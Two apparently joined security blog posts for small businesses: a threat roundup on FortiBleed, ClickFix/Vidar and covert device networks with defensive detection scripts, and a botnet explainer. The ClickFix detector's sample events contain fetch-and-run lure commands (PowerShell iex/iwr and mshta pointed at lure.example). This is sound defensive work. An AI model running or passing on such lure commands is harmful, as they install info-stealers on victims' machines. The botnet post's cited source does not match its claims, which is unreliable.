TL;DR
Three major threat campaigns are active right now: a leak exposing VPN credentials for 73,000+ Fortinet devices worldwide, ClickFix malware delivery targeting Australian networks through compromised WordPress sites, and China-nexus threat actors building covert networks of compromised devices. IBM puts the average data breach at $4.9 million USD, and Australian businesses are squarely in the crosshairs. Ending up a near-miss rather than a victim almost always comes down to fundamentals: patching, MFA, and segmentation.
1. FortiBleed: 73,000 Fortinet VPN Credentials Exposed
A newly surfaced data leak, dubbed "FortiBleed," exposes what appears to be a collection of Fortinet FortiGate VPN credentials covering 73,932 firewall URLs at organizations worldwide. The dataset was posted publicly, so anyone from opportunistic criminals to nation-state actors can attempt to log in through the exposed VPN endpoints and pivot into the corporate networks behind them. Even where a password has since been changed, each entry names an endpoint worth checking.
What this means in dollars: Fortinet SSL-VPN appliances have been a recurring target. CVE-2024-21762, an out-of-bounds write in the FortiOS SSL-VPN component that was exploited in the wild in 2024, and related FortiOS vulnerabilities drove mass compromise campaigns, and organizations that failed to patch faced not only ransomware but full network takeovers. IBM's Cost of a Data Breach Report puts the average breach involving stolen or compromised credentials at roughly $4.65 million USD, and that figure climbs sharply when the initial access vector is an unmonitored VPN appliance that attackers can use for weeks or months before detection.
How victims could have saved millions:
- Apply Fortinet security advisories within 48 hours of release — the patches for these CVEs were available before exploitation peaked
- Disable SSL-VPN access for accounts that don't need it, and enforce hardware-bound MFA on every VPN session
- Rotate VPN credentials immediately if any of your hostnames, public IPs or device serial numbers appear in a credential exposure dataset, and treat every account that could authenticate to that appliance as compromised until it has been reset
- Segment VPN access zones so a compromised endpoint cannot reach production, finance, or backup systems
Do this week: Log into your Fortinet console, confirm the firmware is on a currently patched release, and verify every VPN user has MFA. If you cannot do both this week, restrict SSL-VPN to known source IP addresses (or disable it) until you can.
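Checking your own estate against an exposure list of this kind is a short script rather than a manual search. The following is an added example, not code from the article or from Fortinet. It assumes the list is distributed as one URL or host:port per line, which is how such dumps are usually shared; the leak lines, hostnames and address ranges in it are constructed placeholders, not real leak data.

```python
"""Match an exposed-VPN-endpoint list against your own external assets.

Added example, not code from the original article or from Fortinet.
Assumed leak format: one URL or host:port per line. All sample data below
is constructed for illustration only.
"""
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for the published exposure list (NOT real leak data).
LEAK_LINES = """
https://vpn.example-corp.com.au:10443/remote/login
https://203.0.113.45:443/remote/login
http://203.0.113.45/remote/login
sslvpn.partner-example.net:10443
https://vpn.unrelated-example.org:4433/remote/login
""".strip().splitlines()

# Constructed stand-in for your own asset inventory: public hostnames and the
# address blocks you announce. Replace with your real inventory.
MY_HOSTNAMES = {"vpn.example-corp.com.au", "fw-syd.example-corp.com.au"}
MY_NETWORKS = [ipaddress.ip_network("203.0.113.0/26")]


def parse_endpoint(line):
    """Normalize one leak entry to (host, port); None for blank or junk lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if "://" not in line:          # bare host:port entries get a scheme
        line = "https://" + line
    try:
        parts = urlsplit(line)
        host = (parts.hostname or "").lower().rstrip(".")
        port = parts.port          # raises ValueError on a non-numeric port
    except ValueError:
        return None
    if not host:
        return None
    if port is None:
        port = 80 if parts.scheme == "http" else 443
    return host, port


def is_mine(host):
    """True if host is one of our names (or a subdomain) or an IP in our ranges."""
    if host in MY_HOSTNAMES or any(host.endswith("." + h) for h in MY_HOSTNAMES):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in MY_NETWORKS)


def find_matches(lines):
    """Return sorted unique (host, port) entries from the leak that belong to us."""
    hits = set()
    for line in lines:
        endpoint = parse_endpoint(line)
        if endpoint and is_mine(endpoint[0]):
            hits.add(endpoint)
    return sorted(hits)


if __name__ == "__main__":
    for host, port in find_matches(LEAK_LINES):
        print(f"EXPOSED: {host}:{port} -> rotate credentials and review VPN logs")
```

The match is on the endpoint, not the credential: a hit means the appliance is named in the dump, so rotate every account that can authenticate to it and pull its login history, whether or not the listed password still works.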
2. ClickFix: Malware Delivery Targeting Australian Infrastructure
The Australian Signals Directorate (ASD) has issued an advisory warning that threat actors are using a social engineering technique called ClickFix to distribute Vidar Stealer malware through compromised WordPress websites, with Australian networks specifically named as targets.
ClickFix works by tricking visitors into believing they need to "fix" a problem on the page: a fake CAPTCHA, a verification prompt, or a broken plugin message. The page silently copies a command to the clipboard and instructs the victim to paste it, usually into the Windows Run dialog (Win+R) or a terminal. That command downloads and runs Vidar, an information-stealing trojan that harvests saved browser passwords, session cookies, cryptocurrency wallets, and SSH keys, giving the attacker working access without ever needing to break through a perimeter.
The cost of an info-stealer infection: Unlike ransomware, Vidar infections are often silent. Credentials are exfiltrated and sold on dark web markets for weeks before a business realizes accounts have been compromised. IBM puts the average time to identify and contain a breach at 258 days, during which stolen credentials enable follow-on fraud, invoice redirection, and ransomware deployment. Reported BEC (business email compromise) losses tied to stolen credentials have averaged around $50,000 AUD per incident for Australian SMBs, with total reported losses running to hundreds of millions annually.
How victims could have saved millions:
- Block the execution path, not just the file: restrict PowerShell, mshta and the script hosts for standard users with AppLocker, WDAC or your EDR, and consider removing the Run dialog by group policy; Vidar cannot install if the pasted command cannot run
- Train staff to recognize ClickFix prompts and never copy-paste commands from web pages — this is now an ASD-documented threat pattern
- Audit WordPress sites your business owns or depends on; outdated plugins and themes are the usual entry point for the injected lure
- Shorten session lifetimes and revoke active sessions for any user whose machine shows signs of infection; a password manager and phishing-resistant MFA stop credential phishing, but neither prevents a stolen session cookie from being replayed until that session is invalidated
Do this week: Check whether your organization runs any WordPress sites, confirm they're updated, and brief your team: never run a command a website tells you to paste.
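The tell-tale pattern of a ClickFix compromise is an interpreter launched directly under explorer.exe (the Run dialog) with download-and-execute flags, often with a pasted "I am not a robot" comment still attached. The detection logic below is an added example, not from the ASD advisory or the original article. It models events on the Sysmon Event ID 1 fields ParentImage, Image and CommandLine; the event records, user names, URLs and indicator weights are constructed assumptions for illustration.

```python
"""Flag ClickFix-style process launches in process-creation telemetry.

Added example, not from the ASD advisory or the original article. Events
mirror Sysmon Event ID 1 fields, but every record below is constructed.
"""
import re

# The victim pastes into Win+R, so the interpreter's parent is the shell itself.
RUN_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# (regex, weight, label). Weights are an assumption, tuned for the samples.
INDICATORS = [
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2, "in-memory exec"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I), 2, "remote fetch"),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), 3, "mshta remote HTA"),
    (re.compile(r"\bnop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1, "policy bypass"),
    (re.compile(r"#.*(?:i am not a robot|captcha|verification id)", re.I), 4, "CAPTCHA lure comment"),
]


def score_event(event):
    """Return (score, labels) for one process-creation event."""
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS:
        return 0, []
    score, labels = 0, []
    if parent in RUN_PARENTS:
        score += 2
        labels.append("spawned from explorer (Run dialog)")
    for regex, weight, label in INDICATORS:
        if regex.search(event["CommandLine"]):
            score += weight
            labels.append(label)
    return score, labels


def detect(events, threshold=5):
    """Return (user, score, labels) for events at or above the threshold."""
    hits = []
    for event in events:
        score, labels = score_event(event)
        if score >= threshold:
            hits.append((event["User"], score, labels))
    return hits


# Constructed sample events (not real telemetry). The first two are lures;
# the third is a developer running a build script; the fourth is benign.
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://lure.example/x.ps1)" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 7190"'},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://lure.example/verify.hta"},
    {"User": "CORP\\carol", "ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File .\\build.ps1"},
    {"User": "CORP\\dave", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for user, score, labels in detect(SAMPLE_EVENTS):
        print(f"{user}: score={score} {labels}")
```

Scoring rather than a single pattern keeps the rule tolerant of the constant variation in lure wording: the parent process and the fetch-and-execute flags carry the weight, and the comment string is a bonus, not a requirement.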
3. China-Nexus Covert Networks: Supply Chain at Scale
In a joint advisory, the ASD's ACSC, alongside Five Eyes partner agencies, outlined a significant shift in tactics by China-nexus cyber actors who are building covert networks of compromised devices — including SOHO routers, IoT cameras, and network appliances — to use as infrastructure for espionage, pre-positioning, and facilitating other attacks including ransomware.
This is not a single breach. It's a campaign that enables thousands of breaches. Compromised consumer and small-business devices are chained together into proxy networks that attackers use to hide their origin, relay commands, and stage payloads against larger targets. If your business supplies, integrates with, or shares network trust with a compromised device, you become part of the attack chain.
The supply chain cost multiplier: IBM consistently ranks supply chain compromise among the most expensive breach categories it tracks, with per-incident averages in the $4.55 to $5.5 million USD range, above the overall $4.9 million average. When attackers pivot through a trusted supplier, the victim organization has usually already granted the connection implicit trust, bypassing the controls that would otherwise stop an external attacker.
How victims could have saved millions:
- Treat every supplier network connection as untrusted — apply network segmentation and monitoring to vendor and partner links
- Inventory all internet-facing devices, including those managed by third parties; many compromised devices in these campaigns are forgotten appliances no one knew were exposed
- Implement egress filtering so compromised internal devices cannot beacon to unknown command-and-control infrastructure
- Replace end-of-life SOHO routers and IoT devices — these are the primary recruitment targets for covert networks
Do this week: Download the joint advisory, identify any internet-exposed devices on your network (routers, cameras, DVRs, appliances), and apply the listed mitigations.
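Egress filtering only pays off if someone also looks at what is trying to leave. A hijacked camera or router keeps working for its owner, so the evidence is in the outbound connection log: a device talking to an address outside the allowlist at machine-regular intervals. The following is an added example, not from the ACSC advisory or the original article. It assumes a simplified firewall or NetFlow-style log line (epoch time, source IP, destination IP, destination port); the log lines, internal range, allowlist and timing thresholds are constructed assumptions.

```python
"""Spot beaconing and policy-violating egress in outbound connection logs.

Added example, not from the ACSC advisory or the original article. Assumed
log line: "<epoch> <src_ip> <dst_ip> <dst_port>". All data below is constructed.
"""
import ipaddress
import statistics
from collections import defaultdict

INTERNAL = ipaddress.ip_network("10.0.0.0/8")
# Destinations your egress policy explicitly permits (assumed for the example).
ALLOWED_DST = [ipaddress.ip_network("198.51.100.0/24")]


def parse_line(line):
    ts, src, dst, dport = line.split()
    return float(ts), src, dst, int(dport)


def is_allowed(dst):
    ip = ipaddress.ip_address(dst)
    return any(ip in net for net in ALLOWED_DST)


def unexpected_egress(lines):
    """Every internal->external flow a default-deny egress rule would have blocked."""
    flows = set()
    for line in lines:
        _, src, dst, dport = parse_line(line)
        if ipaddress.ip_address(src) in INTERNAL and not is_allowed(dst):
            flows.add((src, dst, dport))
    return sorted(flows)


def find_beacons(lines, min_conns=6, max_cv=0.15):
    """Return [(src, dst, dport, mean_gap_s)] for un-allowlisted flows whose
    inter-connection timing is too regular to be a person. The coefficient of
    variation (stdev/mean) cutoff and minimum count are assumptions to tune."""
    times = defaultdict(list)
    for line in lines:
        ts, src, dst, dport = parse_line(line)
        if ipaddress.ip_address(src) in INTERNAL and not is_allowed(dst):
            times[(src, dst, dport)].append(ts)
    beacons = []
    for (src, dst, dport), stamps in times.items():
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            beacons.append((src, dst, dport, round(mean, 1)))
    return beacons


# Constructed log lines (not real traffic).
LOG_LINES = [
    # 10.0.20.7 (IP camera) -> 192.0.2.99:8443 about every 5 minutes
    "1700000000 10.0.20.7 192.0.2.99 8443", "1700000301 10.0.20.7 192.0.2.99 8443",
    "1700000599 10.0.20.7 192.0.2.99 8443", "1700000902 10.0.20.7 192.0.2.99 8443",
    "1700001200 10.0.20.7 192.0.2.99 8443", "1700001499 10.0.20.7 192.0.2.99 8443",
    "1700001801 10.0.20.7 192.0.2.99 8443", "1700002100 10.0.20.7 192.0.2.99 8443",
    # 10.0.10.5 (laptop) -> 192.0.2.50:443, a person browsing, irregular gaps
    "1700000000 10.0.10.5 192.0.2.50 443", "1700000045 10.0.10.5 192.0.2.50 443",
    "1700000050 10.0.10.5 192.0.2.50 443", "1700000400 10.0.10.5 192.0.2.50 443",
    "1700000410 10.0.10.5 192.0.2.50 443", "1700001500 10.0.10.5 192.0.2.50 443",
    "1700001520 10.0.10.5 192.0.2.50 443",
    # 10.0.30.3 -> 198.51.100.10:443 every 60 s, but allowlisted (vendor updates)
    "1700000000 10.0.30.3 198.51.100.10 443", "1700000060 10.0.30.3 198.51.100.10 443",
    "1700000120 10.0.30.3 198.51.100.10 443", "1700000180 10.0.30.3 198.51.100.10 443",
    "1700000240 10.0.30.3 198.51.100.10 443", "1700000300 10.0.30.3 198.51.100.10 443",
    # 10.0.20.7 -> 192.0.2.77:80 only three times: too few to judge timing
    "1700000100 10.0.20.7 192.0.2.77 80", "1700000200 10.0.20.7 192.0.2.77 80",
    "1700000300 10.0.20.7 192.0.2.77 80",
]

if __name__ == "__main__":
    print("would be blocked by default-deny egress:", unexpected_egress(LOG_LINES))
    print("beaconing:", find_beacons(LOG_LINES))
```

The two functions answer different questions: unexpected_egress lists what a default-deny rule would stop regardless of intent, while find_beacons picks out the flows that look like command-and-control check-ins, which is what to investigate first if you cannot yet enforce the block.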
FAQ
Q: My business is too small to be targeted by nation-state actors. Is this relevant to me? Small businesses are not the end target — they're the stepping stone. The covert device networks described in the ACSC advisory specifically recruit SOHO routers and small-business appliances. Your compromised device may be used to attack a larger organization you do business with, and the forensic trail leads back to you.
Q: We have MFA on our VPN. Are we safe from FortiBleed? Partially. MFA significantly raises the bar, but if attackers have valid credentials and an unpatched VPN appliance, they may exploit the appliance directly rather than logging in through the normal flow. Patching and MFA together are the effective control — neither alone is sufficient.
Q: How do I know if my credentials appeared in the FortiBleed leak? Check your Fortinet device serial numbers and firewall URLs against the exposure lists published by security researchers. If your organization uses a threat intelligence feed or managed detection provider, request a check. When in doubt, rotate all VPN and admin credentials immediately.
Q: What's the single most cost-effective security control for an Australian SMB right now? Phishing-resistant MFA (FIDO2 security keys or device-bound passkeys) on all email, VPN, and administrative accounts. Stolen or leaked credentials drive two of the three campaigns in this article, and phishing-resistant MFA stops a replayed password outright. It does not, on its own, stop an unpatched appliance from being exploited or a stolen session cookie from being reused, so pair it with patching and short session lifetimes.
Conclusion
The breaches making headlines this month, FortiBleed, ClickFix, and state-sponsored device networks, share a common thread: they exploit gaps in fundamentals far more than novel zero-days. Unpatched VPN appliances, untrained users pasting malware commands, and unmonitored internet-facing devices are not exotic attack vectors. They're the same problems security professionals have been flagging for years, and attackers know most organizations still haven't closed the gaps.
The organizations that avoid the million-dollar losses are not the ones buying the most expensive tools. They're the ones patching on schedule, enforcing MFA, segmenting their networks, and training their people. Every breach in this roundup had a known, documented mitigation available before the damage occurred.
Don't wait for the headline about your business. Visit consult.lil.business for a free cybersecurity assessment and find out exactly where your gaps are before someone else does.
References
- ASD ACSC Advisory — Defending against China-nexus covert networks of compromised devices
- ASD ACSC Advisory — ClickFix distributing Vidar Stealer via WordPress targeting Australian infrastructure
- IBM Cost of a Data Breach Report — 2024 findings and benchmarks
- BleepingComputer — FortiBleed leak exposes Fortinet VPN credentials for 73,000 devices
- CISA — Cross-Sector Cybersecurity Performance Goals (CPG) for SMB baseline security
TL;DR
- The U.S. government shut down a network of 3 million hacked devices — mostly routers and cameras — that were being controlled by criminals
- These devices worked normally for their owners while secretly helping criminals attack other targets
- Your office router, security cameras, and smart devices could be hijacked without you ever noticing
- Simple steps like changing default passwords and updating device software can prevent this
What Is a Botnet?
Imagine someone figured out how to secretly mind-control thousands of toy robots. The robots still do their normal job — cleaning your room, playing music, whatever. But in the background, the controller can also make them do other things: spam your neighbors with junk mail, bang on someone's door all at once to keep them from opening it, or sneak around gathering information.
A botnet works the same way, but with real electronic devices. "Bot" means robot, and "net" means network. A botnet is a network of hijacked devices all controlled by one person or group. The devices — usually things like routers, security cameras, and smart home gadgets — still work normally for their owners. But they're also secretly following the commands of the bad guys.
What Happened?
The U.S. Department of Justice took down a botnet made up of about 3 million devices. These were mostly routers (the box that gives you WiFi), IP cameras (security cameras that connect to the internet), and other smart devices in homes and small businesses.
The criminals controlling these devices used them to:
- Attack websites by flooding them with so much traffic they crash (called a DDoS attack)
- Hide their identity by routing their internet activity through your device, so it looks like the bad activity is coming from your business
- Scan for more victims to add to the botnet and make it even bigger
The owners of these 3 million devices mostly had no idea their equipment was compromised.
How Do Devices Get Hijacked?
Three main ways:
Default passwords. Many routers and cameras come with a pre-set password like "admin" or "password." If you never change it, it's like leaving your front door key under the mat — everyone knows where to look.
Old software that was never updated. Devices run software, and sometimes that software has holes in it. The manufacturer releases a fix, but if you don't install the update, the hole stays open. Bad guys know about these holes and specifically look for devices that haven't been updated.
Devices too old to get fixes. After a few years, manufacturers stop releasing updates for older devices. The device still works, but any new security holes that are discovered will never be fixed. It's like having a lock that the locksmith can't improve anymore.
Could This Be Happening to My Business?
If your office has a router that's been running for years without anyone checking it, a set of security cameras with factory-default passwords, or smart devices that have never been updated — then yes, it's possible.
The tricky part about botnets is that you usually can't tell your device has been hijacked. It still works. The internet still works. The cameras still record. Everything seems fine. The criminal activity happens silently in the background.
What Can You Do?
Change every default password. Log into your router, cameras, and any other smart devices. Change the admin password to something strong and unique. This is the single most effective thing you can do.
Update the software on your devices. Check the manufacturer's website for your router and cameras. If there's a newer version of the software (called "firmware"), install it. Set a reminder to check every few months.
Replace really old equipment. If your router is more than 5 years old, check if the manufacturer still supports it. If they've stopped releasing updates, it's time for a new one. A new router costs a fraction of what dealing with a security problem costs.
Put smart devices on a separate network. Most modern routers let you set up a "guest" network. Put your cameras, smart TVs, and other gadgets on the guest network so they can't directly reach your business computers. If a camera gets hijacked, at least it can't spread to your important stuff.
Turn off remote access if you don't need it. Many routers let you manage them from anywhere on the internet. Unless you specifically need this, turn it off. It's one of the main ways bad guys get in.
Think of your office devices like the locks and windows in a physical building. You wouldn't leave windows open and doors unlocked. The same principle applies to your digital equipment — a little regular maintenance goes a long way.
Not sure if your office devices are secure? lilMONSTER helps small businesses check their routers, cameras, and smart devices for security problems — and fix them before bad guys find them. Talk to us →
FAQ
Q: What is the main security concern covered in this post? A: A botnet of roughly 3 million hijacked routers, IP cameras and other smart devices, disrupted by the U.S. Department of Justice. The devices kept working normally for their owners while criminals used them to flood websites with traffic, hide their own identity, and scan for more victims.
Q: Who is affected by this? A: Any home or small business running a router, camera or smart device that still has its factory-default password, has never had its firmware updated, or is too old to receive updates at all.
Q: What should I do right now? A: Change every default password, update the firmware on your router and cameras, replace equipment the manufacturer no longer supports, put smart devices on a separate (guest) network, and turn off remote management unless you need it.
Q: Is there a workaround if I can't patch immediately? A: Until you can update or replace a device, reduce what it can reach: change its password, move it to the guest network so it cannot touch your business computers, and turn off access to it from the internet. If the manufacturer has stopped releasing updates, plan to replace it rather than wait.
Q: Where can I learn more? A: The Department of Justice announcement and the CISA and ACSC guidance on securing internet-connected devices, listed in the references below.
References
[1] U.S. Department of Justice. "Justice Department Disrupts Botnet Used by Russia's GRU." DOJ Office of Public Affairs, 2024. https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian
[2] Cybersecurity and Infrastructure Security Agency (CISA). "Security Guidance for Critical Infrastructure." CISA, 2024. https://www.cisa.gov/topics/cybersecurity-best-practices/iot-security
[3] Australian Cyber Security Centre (ACSC). "Securing Internet of Things Devices." Australian Signals Directorate, 2023. https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-external-parties/internet-things
[4] Mandiant. "M-Trends 2024 Special Report." Google Cloud Mandiant, 2024. https://www.mandiant.com/resources/m-trends